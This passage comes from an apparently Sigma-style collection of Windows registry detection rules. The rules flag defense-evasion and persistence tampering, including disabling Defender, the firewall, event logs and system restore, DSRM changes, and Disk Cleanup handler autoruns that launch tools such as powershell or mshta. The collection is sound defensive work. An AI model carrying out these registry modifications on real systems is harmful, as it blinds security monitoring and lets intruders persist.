  - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispBackgroundPage'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispCPL'\n            - 'SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer\\DisableNotificationCenter'\n            - 'SOFTWARE\\Policies\\Microsoft\\Windows\\System\\DisableCMD'\n        Details: 'DWORD (0x00000001)'\n    selection_set_0:\n        TargetObject|endswith:\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin'\n            - 'Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\InactivityTimeoutSecs'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\shutdownwithoutlogon'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\\ToastEnabled'\n            - 'SYSTEM\\CurrentControlSet\\Control\\Storage\\Write Protection'\n            - 'SYSTEM\\CurrentControlSet\\Control\\StorageDevicePolicies\\WriteProtect'\n        Details: 'DWORD (0x00000000)'\n    condition: 1 of selection_set_*\nfalsepositives:\n    - Legitimate admin script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml",
    "content": "title: Disable Macro Runtime Scan Scope\nid: ab871450-37dc-4a3a-997f-6662aa8ae0f1\ndescription: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros\nstatus: test\ndate: 2022-10-25\nmodified: 2023-08-17\nauthor: Nasreddine Bencherchali (Nextron Systems)\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/\n    - https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope\n    - https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\'\n            - '\\Microsoft\\Office\\'\n            - '\\Common\\Security'\n        TargetObject|endswith: '\\MacroRuntimeScanScope'\n        Details: DWORD (0x00000000)\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml",
    "content": "title: Disable Privacy Settings Experience in Registry\nid: 0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b\nstatus: test\ndescription: Detects registry modifications that disable Privacy Settings Experience\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md\nauthor: frack113\ndate: 2022-10-02\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\SOFTWARE\\Policies\\Microsoft\\Windows\\OOBE\\DisablePrivacyExperience'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Legitimate admin script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml",
    "content": "title: Disable Windows Security Center Notifications\nid: 3ae1a046-f7db-439d-b7ce-b8b366b81fa6\nstatus: test\ndescription: Detects setting UseActionCenterExperience to 0 to disable Windows Security Center notifications\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md\nauthor: frack113\ndate: 2022-08-19\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Disable Windows Security Center Notifications\n      technique: T1112\n      atomic_guid: 45914594-8df6-4ea9-b3cc-7eb9321a807e\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_system_restore.yml",
    "content": "title: Registry Disable System Restore\nid: 5de03871-5d46-4539-a82d-3aa992a69a83\nstatus: test\ndescription: Detects the modification of the registry to disable a system restore on the computer\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry\nauthor: frack113\ndate: 2022-04-04\nmodified: 2023-08-17\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Policies\\Microsoft\\Windows NT\\SystemRestore'\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore'\n        TargetObject|endswith:\n            - DisableConfig\n            - DisableSR\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml",
    "content": "title: Windows Defender Service Disabled - Registry\nid: e1aa95de-610a-427d-b9e7-9b46cfafbe6a\nstatus: test\ndescription: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry\nreferences:\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n    - https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105\nauthor: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali\ndate: 2022-08-01\nmodified: 2024-03-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\Services\\WinDefend\\Start'\n        Details: 'DWORD (0x00000004)'\n    condition: selection\nfalsepositives:\n    - Administrator actions\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_windows_event_log_access.yml",
    "content": "title: Windows Event Log Access Tampering Via Registry\nid: ba226dcf-d390-4642-b9af-b534872f1156\nstatus: experimental\ndescription: |\n    Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify an event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as \"Get-EventLog\" or \"wevtutil\".\nreferences:\n    - https://www.atomicredteam.io/atomic-red-team/atomics/T1562.002#atomic-test-8---modify-event-log-channel-access-permissions-via-registry---powershell\n    - https://www.youtube.com/watch?v=uSYvHUVU8xY\n    - https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language\nauthor: X__Junior\ndate: 2025-01-16\nmodified: 2025-08-16\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1547.001\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    # O:SYG:SYD:(D;;0x1;;;WD)\n    # O:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(D;;0x1;;;WD)\n    selection_key_1:\n        TargetObject|contains: '\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\'\n        TargetObject|endswith: '\\CustomSD'\n    selection_key_2:\n        TargetObject|contains:\n            - '\\Policies\\Microsoft\\Windows\\EventLog\\'\n            - '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels'\n        TargetObject|endswith: '\\ChannelAccess'\n    selection_details:\n        - Details|contains: 'D:(D;'\n        - Details|contains|all:\n              - 'D:('\n              - ')(D;'\n    filter_main_trustedinstaller:\n        Image: 'C:\\Windows\\servicing\\TrustedInstaller.exe'\n    filter_main_tiworker:\n        Image|startswith: 'C:\\Windows\\WinSxS\\'\n        Image|endswith: '\\TiWorker.exe'\n    filter_optional_empty:\n        Image: ''\n    filter_optional_null:\n        Image: null\n    condition: 1 of selection_key_* and selection_details and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Administrative activity, still unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml",
    "content": "title: Disable Windows Firewall by Registry\nid: e78c408a-e2ea-43cd-b5ea-51975cf358c0\nstatus: test\ndescription: Detects setting EnableFirewall to 0 in order to disable the Windows Firewall\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md\nauthor: frack113\ndate: 2022-08-19\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - \\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile\\EnableFirewall\n            - \\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile\\EnableFirewall\n        Details: DWORD (0x00000000)\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml",
    "content": "title: Disable Windows Event Logging Via Registry\nid: 2f78da12-f7c7-430b-8b19-a28f269b77a3\nstatus: test\ndescription: Detects tampering with the \"Enabled\" registry key in order to disable logging for a Windows event channel\nreferences:\n    - https://twitter.com/WhichbufferArda/status/1543900539280293889\n    - https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-04\nmodified: 2024-03-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\'\n        TargetObject|endswith: '\\Enabled'\n        Details: 'DWORD (0x00000000)'\n    filter_main_wevutil:\n        Image: 'C:\\Windows\\system32\\wevtutil.exe' # FP generated during installation of manifests via wevtutil\n    filter_main_iis:\n        Image|startswith: 'C:\\Windows\\winsxs\\'\n        Image|endswith: '\\TiWorker.exe'  # Many different TargetObjects\n    filter_main_svchost:\n        Image: 'C:\\Windows\\System32\\svchost.exe'\n        TargetObject|contains:\n            - '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-FileInfoMinifilter'\n            - '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-ASN1\\'\n            - '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Kernel-AppCompat\\'\n            - '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Runtime\\Error\\'\n            - '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-CAPI2/Operational\\'\n    filter_main_trusted_installer:\n        Image: C:\\Windows\\servicing\\TrustedInstaller.exe\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Compat-Appraiser'\n    filter_optional_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later\n        Image: ''\n    filter_optional_null: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later\n        Image: null\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Rare false positives may occur when legitimate administrators disable a specific event log for troubleshooting\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml",
    "content": "title: Disable Exploit Guard Network Protection on Windows Defender\nid: bf9e1387-b040-4393-9851-1598f8ecfae9\nstatus: test\ndescription: Detects disabling Windows Defender Exploit Guard Network Protection\nreferences:\n    - https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html\nauthor: Austin Songer @austinsonger\ndate: 2021-08-04\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\\DisallowExploitProtectionOverride'\n        Details: 'DWORD (00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml",
    "content": "title: Disabled Windows Defender Eventlog\nid: fcddca7c-b9c0-4ddf-98da-e1e2d18b0157\nstatus: test\ndescription: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections\nreferences:\n    - https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-04\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Windows Defender/Operational\\Enabled'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Other Antivirus software installations could cause Windows to disable that eventlog (unknown)\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml",
    "content": "title: Disable PUA Protection on Windows Defender\nid: 8ffc5407-52e3-478f-9596-0a7371eafe13\nstatus: test\ndescription: Detects disabling Windows Defender PUA protection\nreferences:\n    - https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html\nauthor: Austin Songer @austinsonger\ndate: 2021-08-04\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Policies\\Microsoft\\Windows Defender\\PUAProtection'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml",
    "content": "title: Disable Tamper Protection on Windows Defender\nid: 93d298a1-d28f-47f1-a468-d971e7796679\nstatus: test\ndescription: Detects disabling Windows Defender Tamper Protection\nreferences:\n    - https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html\nauthor: Austin Songer @austinsonger\ndate: 2021-08-04\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows Defender\\Features\\TamperProtection'\n        Details: DWORD (0x00000000)\n    filter_msmpeng_client: # only disabled temporarily during updates\n        Image|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        Image|endswith: '\\MsMpEng.exe'\n    filter_msmpeng_domain_controller: # only disabled temporarily during updates\n        Image: 'C:\\Program Files\\Windows Defender\\MsMpEng.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml",
    "content": "title: Add DisallowRun Execution to Registry\nid: 275641a5-a492-45e2-a817-7c81e9d9d3e9\nstatus: test\ndescription: Detects setting DisallowRun to 1 in order to prevent users from running specific programs\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md\nauthor: frack113\ndate: 2022-08-19\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml",
    "content": "title: Persistence Via Disk Cleanup Handler - Autorun\nid: d4e2745c-f0c6-4bde-a3ab-b553b3f693cc\nstatus: test\ndescription: |\n    Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\n    The disk cleanup manager is part of the operating system.\n    It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\n    Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\n    Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\n    Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\nreferences:\n    - https://persistence-info.github.io/Data/diskcleanuphandler.html\n    - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    root:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches\\'\n    selection_autorun:\n        # Launching PreCleanupString / CleanupString programs w/o gui, i.e. while using e.g. /autoclean\n        TargetObject|contains: '\\Autorun'\n        Details: 'DWORD (0x00000001)'\n    selection_pre_after:\n        TargetObject|contains:\n            - '\\CleanupString'\n            - '\\PreCleanupString'\n        Details|contains:\n            # Add more as you see fit\n            - 'cmd'\n            - 'powershell'\n            - 'rundll32'\n            - 'mshta'\n            - 'cscript'\n            - 'wscript'\n            - 'wsl'\n            - '\\Users\\Public\\'\n            - '\\Windows\\TEMP\\'\n            - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n    condition: root and 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml",
    "content": "title: DNS-over-HTTPS Enabled by Registry\nid: 04b45a8a-d11d-49e4-9acc-4a1b524407a5\nstatus: test\ndescription: |\n    Detects when a user enables DNS-over-HTTPS.\n    This can be used to hide internet activity or to hide the process of exfiltrating data.\n    With this enabled, organizations will lose visibility into data such as query type, response and originating IP, which are used to identify bad actors.\nreferences:\n    - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html\n    - https://github.com/elastic/detection-rules/issues/1371\n    - https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode\n    - https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS\nauthor: Austin Songer\ndate: 2021-07-22\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1140\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_edge:\n        TargetObject|endswith: '\\SOFTWARE\\Policies\\Microsoft\\Edge\\BuiltInDnsClientEnabled'\n        Details: DWORD (0x00000001)\n    selection_chrome:\n        TargetObject|endswith: '\\SOFTWARE\\Google\\Chrome\\DnsOverHttpsMode'\n        Details: 'secure'\n    selection_firefox:\n        TargetObject|endswith: '\\SOFTWARE\\Policies\\Mozilla\\Firefox\\DNSOverHTTPS\\Enabled'\n        Details: DWORD (0x00000001)\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml",
    "content": "title: New DNS ServerLevelPluginDll Installed\nid: e61e8a88-59a9-451c-874e-70fcc9740d67\nrelated:\n    - id: cbe51394-cd93-4473-b555-edf0144952d9\n      type: derived\n    - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573\n      type: derived\nstatus: test\ndescription: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)\nreferences:\n    - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83\n    - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-05-08\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\services\\DNS\\Parameters\\ServerLevelPluginDll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml",
    "content": "title: ETW Logging Disabled In .NET Processes - Sysmon Registry\nid: bf4fc428-dcc3-4bbd-99fe-2422aeee2544\nrelated:\n    - id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc\n      type: similar\nstatus: test\ndescription: Potential adversaries stopping ETW providers recording loaded .NET assemblies.\nreferences:\n    - https://twitter.com/_xpn_/status/1268712093928378368\n    - https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr\n    - https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables\n    - https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38\n    - https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39\n    - https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_\n    - https://bunnyinside.com/?term=f71e8cb9c76a\n    - http://managed670.rssing.com/chan-5590147/all_p1.html\n    - https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code\n    - https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/\n    - https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-06-05\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\n    - attack.t1562\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_etw_enabled:\n        TargetObject|endswith: 'SOFTWARE\\Microsoft\\.NETFramework\\ETWEnabled'\n        Details: 'DWORD (0x00000000)'\n    selection_complus:\n        TargetObject|endswith:\n            - '\\COMPlus_ETWEnabled'\n            - '\\COMPlus_ETWFlags'\n        Details:\n            - 0 # For REG_SZ type\n            - 'DWORD (0x00000000)'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_dsrm_tampering.yml",
    "content": "title: Directory Service Restore Mode (DSRM) Registry Value Tampering\nid: b61e87c0-50db-4b2e-8986-6a2be94b33b0\nrelated:\n    - id: 53ad8e36-f573-46bf-97e4-15ba5bf4bb51\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the \"DsrmAdminLogonBehavior\" registry value.\n    During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure.\n    Attackers could abuse the DSRM account to maintain their persistence and access to the organization's Active Directory.\n    If the \"DsrmAdminLogonBehavior\" value is set to \"0\", the administrator account can only be used if the DC starts in DSRM.\n    If the \"DsrmAdminLogonBehavior\" value is set to \"1\", the administrator account can only be used if the local AD DS service is stopped.\n    If the \"DsrmAdminLogonBehavior\" value is set to \"2\", the administrator account can always be used.\nreferences:\n    - https://adsecurity.org/?p=1785\n    - https://www.sentinelone.com/blog/detecting-dsrm-account-misconfigurations/\n    - https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dsrm-credentials\nauthor: Nischal Khadgi\ndate: 2024-07-11\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.persistence\n    - attack.t1556\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Control\\Lsa\\DsrmAdminLogonBehavior'\n    filter_main_default_value:\n        Details: 'DWORD (0x00000000)' # Default value\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_enable_periodic_backup.yml",
    "content": "title: Periodic Backup For System Registry Hives Enabled\nid: 973ef012-8f1a-4c40-93b4-7e659a5cd17f\nstatus: test\ndescription: |\n    Detects the enabling of the \"EnablePeriodicBackup\" registry value. Once enabled, the OS will back up the System registry hives on restarts to the \"C:\\Windows\\System32\\config\\RegBack\" folder. Windows creates a \"RegIdleBackup\" task to manage subsequent backups.\n    Registry backup was a default behavior on Windows and was disabled as of \"Windows 10, version 1803\".\nreferences:\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-client/installing-updates-features-roles/system-registry-no-backed-up-regback-folder\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-01\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Control\\Session Manager\\Configuration Manager\\EnablePeriodicBackup'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Legitimate need for the RegBack feature by administrators.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_enable_windows_recall.yml",
    "content": "title: Windows Recall Feature Enabled - Registry\nid: 75180c5f-4ea1-461a-a4f6-6e4700c065d4\nrelated:\n    - id: 5dfc1465-8f65-4fde-8eb5-6194380c6a62\n      type: similar\n    - id: 817f252c-5143-4dae-b418-48c3e9f63728\n      type: similar\nstatus: test\ndescription: |\n    Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of \"DisableAIDataAnalysis\" to \"0\".\n    Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\n    This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/client-management/manage-recall\n    - https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis\nauthor: Sajid Nawaz Khan\ndate: 2024-06-02\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        # HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis\n        # HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis\n        TargetObject|endswith: '\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Legitimate use/activation of Windows Recall\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml",
    "content": "title: Enabling COR Profiler Environment Variables\nid: ad89044a-8f49-4673-9a55-cbd88a1b374f\nstatus: test\ndescription: Detects .NET Framework CLR and .NET Core CLR \"cor_enable_profiling\" and \"cor_profiler\" variables being set and configured.\nreferences:\n    - https://twitter.com/jamieantisocial/status/1304520651248668673\n    - https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors\n    - https://www.sans.org/cyber-security-summit/archives\n    - https://learn.microsoft.com/en-us/dotnet/core/runtime-config/debugging-profiling\nauthor: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)\ndate: 2020-09-10\nmodified: 2023-11-24\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1574.012\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_1:\n        TargetObject|endswith:\n            - '\\COR_ENABLE_PROFILING'\n            - '\\COR_PROFILER'\n            - '\\CORECLR_ENABLE_PROFILING'\n    selection_2:\n        TargetObject|contains: '\\CORECLR_PROFILER_PATH'\n    condition: 1 of selection_*\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml",
